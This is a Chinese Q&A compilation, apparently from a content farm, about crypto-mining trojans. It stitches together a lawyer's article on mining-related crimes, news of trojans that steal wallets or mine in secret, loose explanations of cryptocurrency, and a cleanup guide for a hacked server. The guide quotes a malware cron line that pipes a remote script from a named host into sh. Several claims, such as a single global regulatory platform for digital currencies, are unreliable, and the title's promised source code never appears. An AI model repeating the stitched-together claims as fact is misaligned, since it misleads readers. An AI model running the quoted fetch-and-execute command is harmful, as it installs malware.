虛擬幣挖礦木馬源碼

『壹』 挖「比特幣」等非法「挖礦」行為可能涉嫌的罪名

加密數字貨幣非法「挖礦」行為可能涉嫌的刑事犯罪

作者：李俊南 ，上海華勤基信（杭州）律師事務所負責人

近年來，比特幣、萊特幣、狗狗幣等加密數字貨幣的火熱行情吸引無數一夜暴富心態的人群積極參與，幣安、火幣、OKEx之類的網站迅速擴張擁有大量交易參與方，除了通過買賣途徑，很多人也選擇通過「挖礦」獲得加密數字貨幣。在「挖礦」的過程中產生一系列行為，而其中部分行為可能涉嫌刑事犯罪。筆者認為，如果要辨析可能涉嫌刑事犯罪的行為，必須先就加密數字貨幣和「挖礦」行為的概念進行了解。

第一部分 關於加密數字貨幣和「挖礦」的概念和性質

一、加密數字貨幣的概念

口語化普遍使用「虛擬貨幣」或者「數字貨幣」來指稱比特幣、萊特幣、USDT、狗狗幣等，其實「虛擬貨幣」或者「數字貨幣」的范圍比較廣泛，泛指不受管制的、數字化的貨幣，包括我們日常所知道的騰訊Q幣、盛大元寶等 游戲 幣或置換網站內部增值服務等的網路專用幣，也包括加密數字貨幣，筆者本文探討的各種行為或情節特指加密數字貨幣。加密數字貨幣是一種使用密碼學原理來確保交易安全及控制交易單位創造的交易媒介或者商品，來源於開放式的演算法導致沒有固定的發行方或管理方，通過網路計算方法進行解密獲得原始數字貨幣，因為演算法解總量可控從而做到讓數字貨幣總量固定，交易過程獲得網路中各個節點的認可從而導致交易行為的固定性或安全性。

加密數字貨幣與實物貨幣或者形式貨幣的數字化不同，《關於防範比特幣風險的通知》[1]和《關於防範虛擬貨幣交易炒作風險的公告》[2]明確其作為虛擬商品的性質，「不由貨幣當局發行，不具有法償性與強制性等貨幣屬性，不是真正的貨幣，不應且不能作為貨幣在市場上流通使用」。貨幣最初為不容易大量獲取的物品，而後變為金屬（尤其是金銀），這些本身即有價值的物品被挑選出來賦予交換權，按照某一時間點特定的價值比例可以循環、普適地交換其他商品或服務。政府（包括其他具有公信力的主體）成立後發行法幣，基於政府公信力和金銀儲量等基礎進行許諾，賦予法幣可以代替實物貨幣進行與商品或服務之間的交換。法幣（比如人民幣、美元、英鎊等）是在主權信用、貨幣契約理論和金銀儲備等基礎上而被賦予的代表一定可供交換價值的 社會 接受度。而 社會 之所以接受，是因為發行法幣時，主權機構將會就該等份額的法幣做出相應信用許諾，法幣具有轉化為真實實物價值的可能性。通常每個主權國家或區域只是用一種法幣，由中央銀行發行和控制，嚴格遵循「MPQV」的公式進行計算，避免發生嚴重背離市場的通貨膨脹或緊縮。

加密數字貨幣背後並沒有所謂的主權信用或價值支撐，是通過區塊鏈技術保密和流通、計算機演算法而獲得的虛擬物。區塊鏈是用分布式資料庫識別、傳播和記載信息的智能化對等網路。2009年比特幣第一個區塊被開發出來，有人稱之為「創世區塊」。用於加密數字貨幣的計算機演算法，目的是生成一種虛擬標記，這個標記被設定的程序認為完成了程序要求的解或運算結果程度，基於運算結果給這個標記一定的數字貨幣值。這個值本身沒有內在價值，是數學難題的解答，充其量可能對應的就是解法研發和所耗費的「礦機」購買價格、能耗價格等，而前者無法代表有價物，後者代表的只有消耗而沒有創造。

二、「礦機」和「挖礦」

獲得加密數字貨幣的初始方法就是運算，需要藉助計算機（「礦機」）來完成復雜運算過程。「礦機」通過中央處理器晶元或者顯卡參與數學計算，開展「挖礦」過程。如果能夠計算出結果，那麼被賦予一個或者幾分之一個數字貨幣值。以比特幣為例，「挖礦」就是找到一個隨機數（Nonce）參與哈希運算Hash（BlockHeader），使得最後得到的哈希值符合難度要求。

「挖礦」過程涉及的參與方和設備材料包括礦工、礦機、礦機銷售方、礦池管理方、區塊確認和廣播等。礦工可以簡單地理解為參與「挖礦」的每個人或機構，礦池是為了避免單個礦工「挖礦」收益的不穩定性而聚合礦工後產生的集合，根據不同礦工的運算貢獻對收益結果進行分配，區塊確認和廣播是通過區塊鏈節點互相認可某一個礦機代表的礦工工作量證明，進行記賬和通知其他節點。礦工的收益存儲於有密鑰的電子錢包中，可以查閱、使用和交易。「挖礦」的形式主要分為集中託管式和分布式，前者是礦工將礦機託管給某個礦池管理方，礦工支付電費和管理費，礦池管理方統一進行操作維護；後者是礦工自行管理礦機。

筆者認為單純的「挖礦」行為在此前並未存在任何有關於涉嫌違法的法律規定，但2021年5月21日國務院金融穩定發展委員會召開第五十一次會議，根據會議精神，「堅決打擊比特幣挖礦和交易行為」，此後就虛擬貨幣非法「挖礦」行為應當會出台進一步的規定。

第二部分 非法「挖礦」行為涉及刑事犯罪的現狀

一、筆者以「刑事案件」、「虛擬貨幣」、「挖礦」等關鍵詞在中國裁判文書網中進行搜索，存在132篇文書。經過對案件文書的研判，筆者發現：

1.根據審判程序來看。 一審判決書佔比81.81%；二審裁定書等佔比16.67%；審判監督駁回申訴通知書等佔比1.52%。

2.根據定罪罪名來看。 （1）一審定罪主要分布為：盜竊罪主要為盜竊公共電力資源，計算機系統相關犯罪主要為在他人計算機內植入木馬外掛程序、利用工作職務便利使用可控制的計算機系統挖礦等，非法吸收公眾存款罪、詐騙罪、集資詐騙罪和組織、領導傳銷活動罪除了與「挖礦」有關，還與加密數字貨幣的發行緊密相關，少量盜竊罪和其他類案件主要是與礦機買賣相關，或「挖礦」收益取得後被非法侵犯產生的其他犯罪行為。大量案件為單一罪名，少量案件數罪並罰。（2）二審定罪主要為組織、領導傳銷組織犯罪，佔50%；控制、入侵、破壞計算機系統等計算機系統相關犯罪，佔18.18%；其餘各項罪名（搶劫罪、集資詐騙罪、非法吸收公眾存款罪、盜竊罪等）佔31.82%。基本所有案件均維持原判。

二、筆者另通過網路搜索發現：

2018年5月騰訊網報道[3]稱，「西安市未央區檢察院提前介入一起特大網路黑客盜竊虛擬貨幣案，並批捕該案三名嫌疑人。三名嫌疑人為專業化的網路技術人員，組織『黑客聯盟』非法侵入他人計算機系統並將計算機中的虛擬貨幣轉移，涉案金額高達6億元」。

2020年11月哈爾濱新聞網報道[4]稱，黑龍江警方抓獲28名犯罪嫌疑人，成功破獲一起涉嫌以「哥倫布CAT虛擬貨幣」「挖礦」為噱頭的特大網路傳銷案件，總價值近人民幣3億元。

2021年5月8日法制現場報道[5]稱，武漢市洪山警方「宣布打掉一專為網路詐騙團伙開發APP的 科技 公司」，「晟昌 科技 」接受委託定製開發一款名為聯合眾鑫的虛擬幣平台，以USDT充值後，「宣稱兌換聯合眾鑫獨有幣種ZBCT後，可在平台內購買礦機挖礦產生收益」，但礦機運營圖片全部為網路圖片，同時可以使用後台修改許可權，「隨意修改ZBCT價格及具體收益比率」。「晟昌 科技 」公司「3年間開發了150餘個涉及區塊鏈、虛擬貨幣、電子錢包、網路商城等APP、小程序，幾乎全部是網路金融詐騙、傳銷團伙所定製」[6]。

公布案例和網路報道表明，近年來與加密數字貨幣「挖礦」行為相關的違法犯罪活動非常猖獗，採取網路等方式，存在金額高、行為性質復雜、多角色參與、受害者群體遍布廣等特徵。

第三部分 就非法「挖礦」行為涉及刑事犯罪的一些思考

一、我國關於非法「挖礦」行為的態度

從2013年12月中國人民銀行等五部委發布的《關於防範比特幣風險的通知》至2021年5月21日國務院金融穩定發展委員會第五十一次會議要求，都在宏觀層面確認了加密數字貨幣在發行、交易過程中可能存在風險。因為加密數字貨幣去中心化不可管控的特性，被大量的犯罪活動所「青睞」。

2021年5月25日，內蒙古發展和改革委員會發布了《關於堅決打擊懲戒虛擬貨幣「挖礦」行為八項措施（徵求意見稿）》，發布之前已多次對虛擬貨幣「挖礦」和交易行為進行圍追堵截。國家能源局四川監管辦公室發布《關於召開虛擬貨幣「挖礦」有關情況調研座談會的通知》。

二、從國際上而言

新加坡、韓國、日本等地均已出台了與虛擬貨幣相關的行業規范政策，比如在投資人門檻、交易所牌照、實名認證機制等方面均有所要求。印度則准備直接禁止民眾交易及持有加密數字貨幣。各個國家和地區的大趨勢也逐漸朝著管控方向歸攏。

三、非法「挖礦」行為的非法性體現分析

單純的個人購買或者租用礦機進行加密數字貨幣「挖礦」，並未有法律規定禁止，這是基於個人需要而獲得虛擬商品的行為，需要被禁止的應當是帶有非法屬性的「挖礦」行為。

前文提及的案例表明，主要犯罪行為體現為：

1.技術型非法攫取

部分不法分子利用投資者購買礦機，或管理計算機，或其他便利條件，通過對計算機系統內植入木馬病毒為自己「挖礦」，涉嫌 入侵、控制或破壞計算機系統犯罪 ,或盜取他人已經獲得的加密數字貨幣 涉嫌盜竊罪 。

2.盜取電力資源

部分不法分子通過私設電纜、增設微電腦控制器等手段盜竊電能用於「挖礦」，已經成為了部分地區的多發性案件。盜電行為不僅僅直接通過秘密手段非法使用和侵犯了公共資源和他人合法權益，同時可能會因線路漏電引起火災、影響節能減排政策下的區域供電安排和平衡、影響區域性階梯用電的電價，應予以打擊。

3.引發 非法吸收公眾存款罪，詐騙罪 或 組織、領導傳銷活動罪 等涉眾

（1）A宣稱可以銷售（含銷售後託管）或租賃礦機進行「挖礦」， A向 社會 公眾宣稱，礦機具有強大的算力（衡量礦機銷售價格或租賃費用多以算力或配置為主要標准之一），稱可以每月獲得一定的加密數字貨幣收益回報。如果回報是維持在一定的固定標准時，則A就有可能 涉嫌非法吸收公眾存款罪 。

（2）A宣稱其礦機存在一定標準的算力，但實際未達到該等運算效率，甚至礦機並不實際存在，A收受投資人支付的購買款和租賃費，就 涉嫌詐騙罪、合同詐騙罪 或 集資詐騙罪 。

（3）A通過三級以上代理渠道推廣「挖礦」業務，要求各級代理必須先購買或承租一定數量的礦機，可以介紹他人參與購買或承租礦機「挖礦」的行為，可以獲得浮動收益。也就是說，代理通過購買或承租一定數量的礦機獲得入會資格，再通過拉人頭等方式拿到另外的利潤分配，形成三級或以上組織架構，A將 涉嫌組織、領導傳銷活動罪 。

四、再進一步思考

1.A沒有礦機或礦機根本不符合其宣稱的性能，向投資人銷售的同時約定託管，或進行租賃時以虛假信息表現存在礦機、以各種借口阻止投資人現場查看或查看虛假場所，但是A與投資人約定退出機制並按月交付投資收益，在市場上購買加密數字貨幣宣稱「挖礦所得」給予投資人、賺取利差的行為，是否涉嫌犯罪？筆者認為A的行為屬於詐騙行為，究其本質都是採用了虛構事實或者隱瞞真相的行為，使投資人誤以為A有符合宣傳的礦機、可以帶來符合預期的收益，才支付的購買價款或租賃費用。

2.A自己發行了一種加密數字貨幣，自行定價，宣稱租賃A的礦機可以「挖礦」獲得該加密數字貨幣，實際上並沒有礦機供投資人使用，僅僅是根據投資人的投入金額，向投資人固定地發放加密數字貨幣。A通過程序設定「挖礦」所得數量，甚至將該加密數字貨幣與主流加密數字貨幣的兌換價格無限調整，是否涉嫌犯罪？筆者認為，A的行為仍然是詐騙行為，該加密數字貨幣可能僅僅在A控制網路節點中做閉環運作，通過一系列的包裝，利用投資人的回報期待，以無價值的數字化產物置換法幣（也可能現要求投資人以法幣購買主流加密數字貨幣，再以主流加密數字貨幣進行投資，增加手段的隱蔽性），實際上還是非法佔有受害人財產。

3.A發行了加密數字貨幣，投資人租賃礦機參與「挖礦」的目的不在於看好該加密數字貨幣的升值空間，而在於該加密數字貨幣與主流加密數字貨幣的恆定兌換比例。投資人以其獲得的黑色或灰色收入購買該加密數字貨幣，在閉環系統里兌換為主流加密數字貨幣，通過買賣獲得法幣資產。涉及犯罪所得的非法收入通過「挖礦」洗白。A的行為根據其故意程度、參與上游犯罪程度，可能涉嫌上游犯罪的共犯、幫助網路信息犯罪活動罪、掩飾隱瞞犯罪所得罪、洗錢罪等。

綜上所述，大量人群為了高回報期待參與「挖礦」行為，在不法分子的引誘、欺騙下，或在自身利益驅動下可能發生違法犯罪的行為，涉案的罪名種類繁多，行為手段也日趨復雜化、隱蔽化、涉眾化，需要加強監管，避免加密數字貨幣的熱潮給犯罪活動提供溫床。

『貳』 如此多的虛擬貨幣平台，多少崩盤了

合肥人李某今年10月份花14萬累計購買了124個比特幣。事後，李某加入一些比特幣玩家聊天群，密切關注比特幣的行情。 10月22日，群內一個網名Michael的人主動找李某聊天，問他是否挖礦。 「我不會，而且也挖不到錢。 」李先生如是回答。Michael一再慫恿李某試試看，並給李某發來了「挖礦工具」，聲稱可用該工具挖到更多比特幣。在隨後的聊天中，Michael不斷提醒李某要將比特幣放在錢包，並稱交易網站不安全。 「網路上不時有交易網站倒閉、跑路的消息，他說的也蠻在理，就相信他了。 」李某告訴安徽商報記者。
100個比特幣不翼而飛
李某接收並安裝了挖礦工具。 10月26日晚，他在Michael的誘導下陸續將名下100個比特幣放到電子錢包中。不過，當電子錢包中的比特幣剛到100時，竟突然不翼而飛。李某一下子慌了神，再與Michael聯系時，對方便隱身不見了。
李某告訴記者，目前一個比特幣要賣五六千元左右，100個比特幣價值五六十萬元。事後，李某向警方報案。不過，令李某失望的是，因為比特幣是一種虛擬貨幣，目前國內尚無相關法律能夠對其交易進行規范和保護。警方沒有立案。 「現在，這個叫Michael的人還在網上活躍，他就是在鑽法律的空子。 」李某告訴安徽商報記者。
「挖礦工具」里有木馬
李某的比特幣怎麼會不翼而飛呢？ 360安全工程師與他聯系並檢測了Michael的「挖礦工具」，發現該工具就是今年非常流行的「比特幣大盜」木馬。據360安全中心分析，「比特幣大盜」木馬大多偽裝成挖礦工具、精簡錢包等壓縮文件，一旦玩家中招，木馬便會自動搜索比特幣錢包文件，並通過電子郵件、黑客遠控等方式將錢包文件偷走。

『叄』 現在每一個數字虛擬貨幣都有開源代碼我們怎麼分析呢

五種區分方法：去中心化、恆量「發行」、開源代碼、獨立的電子錢包以及第三方交易平台。

一、去中心化

很多人對去中心化概念比較模糊，也有很多關於幣的項目也在打著去中心化的旗號在推動者這個市場。

1、技術去中心化：比特幣，萊特幣是整個數字貨幣的一個幣種，區塊鏈技術是2.0。美國5年的一個研究，它研究這一塊是失敗的，只達到1.0。

2、不屬於任何一個公司國家或者機構。比如人民幣，美元等都是法幣，是由國家發行和控制，是由中心的；還有騰訊公司的Q幣也是有中心的，叫虛擬幣，不叫虛擬貨幣，是騰訊公司發行的。

二、價格為什麼會漲的，恆量「發行」。

其實真正意義上來說，是不應該用「發行」二字的，比特幣2100萬枚，萊特幣是8400萬枚，其發起人是把這個數字貨幣計算機計算好，用一套公式保存起來，用互聯網程序規定它全球只能有多少枚，是挖掘出來的。

聽說挖地挖地，挖地的礦機，都是時間和數量限制好的，是任何個人或者機構都是更改不了的，並公開它的源代碼，誰都可以挖。物以稀為貴，之所以挖礦，就如地球上的黃金一樣越挖越少，所以叫挖礦，價格就會上漲。

人民幣一直在超發，就出現通貨膨脹的現象，越來越不值錢。真正的數字貨幣是全球永不蒸發，恆量「發行」，具有真正的稀缺性的，通貨緊縮的特質。

三、開源代碼，這是一個關鍵核心。

目前所有的數字貨幣只有一個監管平台，開源代碼成熟，一定要去全球唯一的數字貨幣監管平台審核，通過後掛在此平台上，公布它的開源代碼。

還有一種方式，就是你看各大交易平台是不是有萊特幣和比特幣的身影，凡是公開透明的都是自由買賣交易。

四、獨立的電子錢包。

跨境支付的，是可以給某個區域的轉賬。

五、第三方交易平台

封閉式的交易平台和開放式的交易平台

1、什麼是封閉式交易平台呢？

舉例，比如憑票購物，憑票吃飯那個年代，你是化工廠的，你是糧局的，今天你拿著工廠的飯票去糧局吃飯是不可以的，是屬於內部掌控的。

2、開放式的交易平台，像OKCOIN，火幣網，都是開放式的。任何一個平台購買的萊特幣都是可以在這個平台上進行買賣交易的，公開，透明。

總之，是不是真正數字貨幣，有五大標准：

1、去中心化；2、開源代碼；3、恆量發行；4、第三方交易平台；5、電子錢包。

(3)虛擬幣挖礦木馬源碼擴展閱讀：

虛擬貨幣基本階段

沒有把游戲幣與股票、衍生金融工具、特別是電子貨幣加以界定和區分。實際上，有一條內在線索可以把這些形態各異的虛擬貨幣貫穿起來，這就是個性化價值的表現成熟度。我們從邏輯上概括如下：

一、銀行電子貨幣

銀行電子貨幣最初是一種「偽虛擬貨幣」。它只具有虛擬貨幣的形式，如數字化、符號化，但不具有虛擬貨幣的實質，與個性化無關。例如，它只是紙幣的對應物；它可能由央行發行；它可能與貨幣市場處於同一市場等。

但是銀行電子貨幣有一點突破了貨幣的外延—那就是它也可以不是由央行發行，而是由信息服務商發行，早期的幾種電子貨幣就是這樣。第二點突破就是銀行電子貨幣的流動性，遠遠超過一般貨幣。因此就隱含了對貨幣價格水平定價權的挑戰。

比如，在隔夜拆借之中，如果同一筆貨幣以電子貨幣方式被周轉若干次，雖然從傳統貨幣觀點，一切都沒有發生，但如果從虛擬貨幣流通速度的角度看，實際上已改變了貨幣價格水平的條件。

二、信用信息貨幣

股票是最典型的信用信息貨幣，其本質是虛擬的，是一種具有個人化特點的虛擬貨幣。它是當前虛擬經濟最現實的基礎。股票市場、衍生金融工具市場，構成了一個規模龐大而且統一的虛擬貨幣市場，它們不僅有實體業務作為基礎，而且有廣泛的信託業務、保險業務等信息服務作為支撐。

所謂統一市場是有所特指的，是指這一市場作為一個整體，可以同貨幣市場在國民收入的整體水平上進行交換。從歷史上看，只有當貨幣形成統一市場，即國民經濟的主體都實現貨幣化時，貨幣量和利率對國民經濟的調節作用才談得上。這個道理對虛擬經濟也一樣。

這個問題不無爭議，如今虛擬經濟的規模，雖然已經若干倍於實體經濟，但實體經濟中畢竟還有很大一部分沒有進入這個統一市場。如果把游戲幣與股票比較，它在這方面的進展還差得遠。只有經過娛樂產業化和產業娛樂化兩個階段，才有可能達到統一市場的水平。

分析股票市場和衍生金融工具市場，它有一個與一般貨幣市場最大的不同，就是它的流通速度不能由央行直接決定。例如，股指作為虛擬貨幣價格水平，不能象利率那樣，由央行直接決定，而是由所謂人們的「信心」這種信息直接決定的。

央行以及實體資本市場的基本面，只能間接決定股市，而不能直接決定。所以我認為股票市場是信息市場而不是貨幣市場。

同成熟的虛擬貨幣市場比較，股市在主要特徵上，表現是不完全的。股市把所有參照點上的噪音（即個別得失值），集成為一個統一的參照值，與標准值（基本面上的效用值、一般均衡值）進行合成，形成市場圍繞效用價值的不斷波動。

雖然有別於以央行為中心進行有序化向心運動的貨幣市場，但與貨幣市場又沒有區別。而從真正的虛擬貨幣市場的觀點看，不可通約的個性化定價值，才是這一市場的特性所在。從這個意義上說，集中的股市並沒有實現這一功用，股市作為所謂「賭場」的獨立作用還沒有得到發揮。

三、個性化信用憑證

虛擬貨幣的根本作用，是在個性的「現場」合成價值，而不是跑到一個脫離真實世界的均衡點上孤立地確定一個理性價值。虛擬貨幣的意義在於以最終消費者為中心建立價值體系。虛擬貨幣全面實現後，只有一般等價功能的單一貨幣將趨於後台化。

游戲幣是更高階段虛擬貨幣的試驗田，還難當大任。理想的虛擬貨幣是真實世界的價值符號。在一般等價交換中，具體使用價值以及具體使用價值的主體對應物—人的非同質化的需求、個性化需求，被完全過濾掉。

虛擬貨幣將改變這一切，通過虛擬方式，將人的非同質化需求、個性化需求以個體參照點向基本面錨定的方式，進行價值合成。因此虛擬貨幣必須具有兩面性，一方面是具有商品交換的功能，一方面是具有物物交換的功能。

通過前者克服價值的相對性和主觀性，通過後者實現個性化的價值確認。 為了實現這個目標，虛擬貨幣肯定要實現一不為人知的巨大轉型，這就是向對話體系的轉型，成為互動式貨幣。

這里的討價還價是針對貨幣價格水平的討價還價。回憶一下，人類在幾十年內，早已實現的文本向對話的轉型，正是虛擬貨幣轉型的方向所在。游戲幣的價值其實是不確定的。人們交換到游戲幣，從中最終可能得到的快樂，是在幣值以上、還是以下，不到參與游戲之時是不確定的。

游戲就是一個對話過程。當然，游戲幣的各種增值功能，還沒有結合個性化信息服務開發出來。如果這種增值業務充分得到開發，游戲幣因為提供服務的商家不同而不通用，可能反而成為一種相對於股票的優勢。

完全個性化的虛擬貨幣，可能是一種附加信息的貨幣卡，它的價值是待確認的。擁有具體待定功能和余值的虛擬貨幣，其信息一方面可以具有象文本一樣有再闡釋的餘地，一方面具有卡拉OK式的再開發的潛力。

它的信息價值是有開放介面的，可以再增值的。如果把它們投入股市一樣的二級市場交換，它們可能憑其個性化信息在基本票面價值上下浮動，它本身就會具有更多的象股票那樣的吸引力。

游戲貨幣，還只具有價值流通功能，而不具有市場平台功能，所以它只是一種不完善的虛擬貨幣，究其原因，是因為缺乏相應的產業基礎。

『肆』 電腦挖礦違法嗎

正常用著的電腦，卻被非法控制，替別人「幹活」，用戶卻渾然不知。原來，電腦被植入了挖礦程序及挖礦監控程序，監控程序只要監測到電腦CPU利用率低於50%，挖礦程序就會在後台靜默啟動，通過大量耗費被控電腦的CPU、GPU資源和電力資源，持續不斷地挖取虛擬貨幣，並將這些虛擬貨幣轉至控制者處，從而提現牟取暴利。
近期，濰坊市公安局網安支隊會同青州市公安局在公安部、省公安廳指導下，在騰訊守護者計劃安全團隊協助下，按照公安部和省公安廳「凈網2018專項行動」部署要求，成功破獲部督「1.03」特大非法控制計算機信息系統案，目前抓獲犯罪嫌疑人20名，取保候審11名，批捕9名。
經查，大連昇平網路科技有限公司研發挖礦監控軟體、集成挖礦程序後，通過發展下線代理，非法控制了全國389餘萬台電腦主機做廣告增值收益，在100多萬台電腦主機靜默安裝挖礦程序。兩年期間共挖取DGB幣（「極特幣」）、DCR幣（「德賽幣」）、SC（「雲產幣」）幣2600餘萬枚，共非法獲利1500餘萬元。
據了解，雖然非法控制計算機信息系統的違法犯罪屢見不鮮，但是數量達到如此之巨，而且通過植入靜默挖礦程序這種新型手段，進行虛擬貨幣變現，這在全國是比較少見的。

游戲外掛暗藏挖礦木馬程序
2018年1月3日，濰坊市公安局網安支隊接騰訊守護者計劃安全團隊報案稱，騰訊電腦管家檢測到一款游戲外掛暗藏了一款木馬程序，該木馬程序具備後台靜默挖礦功能。
「挖礦，就是通過大量計算機運算獲取數字貨幣-虛擬貨幣獎勵，這個過程對電腦硬體配置要求比較高，主機經常長期高負荷運轉，顯卡、主板、內存等硬體會提前報廢，對電腦的損害極大。」辦案民警介紹。
辦案民警說，違法犯罪人員通常提前調研市面上挖取難度較低的虛擬貨幣，通過雲計算、顯卡雲計算業務非法控制用戶的電腦主機，植入這種虛擬貨幣的挖礦程序進行挖礦，用戶對此毫無察覺，只要電腦處於開機狀態，挖礦程序就在後台靜默運轉，在挖取到大量礦幣後迅速轉至控制者那裡變現提現，牟取高額利潤。
初步統計，該木馬程序感染數十萬台用戶機器。濰坊市公安局網安支隊接案後，迅速研判案件線索，通過互聯網提取到外掛木馬樣本，找到木馬開發者建立的木馬交流群，初步落查發現該款木馬程序開發者在青州市。市局網安支隊將該案情通報青州市公安局，由市局網安支隊、青州市局成立專案組，對該案立案偵查。
專案組確定交流群群主身份為楊某寶。通過偵查發現，楊某寶一是建立了多個外掛討論群，在群文件中共享外掛程序；二是利用「天下網吧論壇」版主的身份，將上傳含有木馬的外掛程序到「天下網吧」論壇供網民下載；三是通過網路網盤進行分享下載。
3月8日，專案組制定了詳細的抓捕方案，在家中將楊某寶抓獲。

『伍』 很多虛擬貨幣會出現提前挖礦的作弊現象，那個雷樂幣會不會啊

應 該 不 會 ， 雷 樂 幣 他 們 在 發 行 時 就 提 前 宣 布 時 間 ， 並 且 承 諾 絕 不 作 弊 提 前 挖 礦 。 雷 樂 幣 的 所 有 交 易 記 錄 雖 然 是 公 開 的 ， 但 是 這 些 交 易 的 相 關 人 是 匿 名 的 。 雷 樂 幣 的 所 有 源 代 碼 也 是 公 開 的 ， 所 有 人 都 可 以 檢 查 代 碼 ， 沒 有 任 何 作 假 的 可 能 。

『陸』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『柒』 虛擬幣怎麼搭建礦池 虛擬幣研發與運營 虛擬幣製作

虛擬貨幣製作需要專業的團隊，但是如果去製作一個直銷幣，沒存在錢包，也不存在維護，只是純粹的數字，那就簡單多了，成本是非常低的，一個交易平台也就是幾千塊錢吧。但是這種平台存在嚴重的漏洞，很容易被攻擊。
如果想創造一個像比特幣、瑞泰幣、千金卡一樣的虛擬貨幣，那就需要付出一些努力，這些幣首先需要卡法一個可下載的錢包，已經確定這種幣的應用場景，同時還需要創建一個安全靠譜的交易平台。

『捌』 挖礦木馬，挖礦消耗計算機資源到底是在做什麼東西

區塊鏈技術，貨幣是有限的，消耗資源挖礦，進行虛擬貨幣交易。

『玖』 虛擬貨幣有了開源代碼就可以挖礦嗎

EGD網路通過「挖礦」來生成新的EGD。所謂「挖礦」實質上是用計算機解決一項復雜的數學問題，來保證EGD網路分布式記賬系統的一致性。EGD網路會自動調整數學問題的難度，讓整個網路約每2.5分鍾得到一個合格答案。隨後EGD網路會新生成一定量的EGD作為賞金，獎勵獲得答案的人。 2014年1月1日EGD誕生的時候，每筆賞金是50個EGD。誕生2.5分鍾後，第一批50個EGD生成了，而此時的貨幣總量就是50。隨後EGD就以約每2.5分鍾50個的速度增長。當總量達到4200萬時(8400萬的50%)，賞金減半為25個。當總量達到6300萬(新產出2100萬，即4200的50%)時，賞金再減半為12.5個。